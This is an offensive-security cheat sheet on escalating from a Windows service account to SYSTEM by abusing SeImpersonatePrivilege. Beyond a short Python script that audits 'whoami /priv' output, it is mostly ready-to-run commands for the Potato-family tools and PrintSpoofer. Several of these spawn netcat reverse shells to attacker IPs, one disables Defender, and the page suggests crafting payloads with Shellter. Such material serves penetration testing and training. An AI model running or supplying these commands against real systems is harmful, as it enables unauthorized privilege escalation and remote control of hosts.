# SeImpersonatePrivilege

This method takes advantage of the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege privileges to elevate from a local service account to SYSTEM. These privileges are usually granted by default to the service accounts that run <mark style="color:blue;">IIS</mark> or <mark style="color:blue;">SQL</mark> services, so a shell obtained through one of those services frequently already holds them.

Whether the current token holds them can be checked with the following command:

```
whoami /priv
```
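As an added audit check (example code written for this page, not from any of the tools it lists), the following Python script parses saved `whoami /priv` output and reports which impersonation privileges the token holds. It assumes the output of the command above was captured as text; the sample output embedded below is constructed.

```python
import re

# Privileges that allow impersonating or assigning a token; every Potato-style
# escalation on this page depends on the current token holding one of them.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# One privilege row of `whoami /priv`: name, free-text description, state.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(output: str) -> dict:
    """Map each privilege name in `whoami /priv` output to its state."""
    privs = {}
    for line in output.splitlines():
        # Header, separator and blank lines do not match and are skipped.
        match = ROW_RE.match(line.strip())
        if match:
            privs[match.group(1)] = match.group(2)
    return privs


def impersonation_risk(output: str) -> list:
    """Return (name, state) for every impersonation privilege the token holds."""
    privs = parse_whoami_priv(output)
    # The state is reported but not used as a filter: a privilege shown as
    # Disabled is still assigned to the token and the process can enable it.
    return sorted((n, s) for n, s in privs.items() if n in IMPERSONATION_PRIVS)


# Constructed sample output (not captured from a real host), shaped like the
# privileges of a typical IIS application pool identity.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

if __name__ == "__main__":
    for name, state in impersonation_risk(SAMPLE):
        print(f"{name}: {state}")
```

A privilege listed as Disabled still counts as a finding: it is assigned to the token and can be enabled by the process itself, so presence rather than state is what the check reports.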

### HotPotato

It was the first of the Potato family and was discovered by Stephen Breen. It can be downloaded from [here](https://github.com/foxglovesec/Potato). DCOM has to be enabled on the target for this attack to work.

```
Potato.exe -ip <local ip> -cmd [cmd to run] -disable_exhaust true -disable_defender true
```

### JuicyPotato

JuicyPotato is a privilege escalation tool created by Andrea Pierini and Giuseppe Trotta.

A COM server CLSID that is valid on the target system is required for exploiting this vulnerability. You can get the CLSID from the predefined list put together by the authors [here](http://ohpe.it/juicy-potato/CLSID/).

Alternatively, you can find a CLSID that works on the target system by using the following series of scripts.

Load the following PowerShell helper:

{% embed url="https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1" %}

Then use the following script to generate the list of candidate CLSIDs:

{% embed url="https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1" %}

The following batch script will then try every CLSID you generated to find one that works:

{% embed url="https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat" %}

Once we have everything we need, we can use JuicyPotato to elevate privileges by launching Netcat and having it send a reverse shell back to our machine:

```
JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 192.168.1.11 443" -t *
```

You can also craft a common executable with the malicious payload using tools like "Shellter" and have it executed on the target system through JuicyPotato.

> JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.

### JuicyPotatoNG

This is the next iteration of JuicyPotato and it can be downloaded from [here](https://github.com/antonioCoco/JuicyPotatoNG/releases/tag/v1.1).

```
.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\temp\nc64.exe 192.168.45.180 4433 -e cmd.exe"
```

### PrintSpoofer64

The executable can be downloaded from [here](https://github.com/itm4n/PrintSpoofer/releases).

```
.\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
```

### RoguePotato

The executable can be downloaded from [here](https://github.com/antonioCoco/RoguePotato).

```
.\RoguePotato.exe -r YOUR_IP -e "C:\WRITABLE_DIRECTORY\rs443.exe" -l 9999
```

### GodPotato

The executable can be downloaded from [here](https://github.com/BeichenDream/GodPotato).

```
.\GodPotato-NET35.exe -cmd "C:\Users\john\Desktop\rs4444.exe"
```

### SharpEfsPotato

The executable can be downloaded from [here](https://github.com/bugch3ck/SharpEfsPotato).

```
SharpEfsPotato.exe -p "C:\Windows\system32\cmd.exe" -a "/c C:\temp\nc64.exe 192.168.45.180 4433 -e cmd.exe"
```

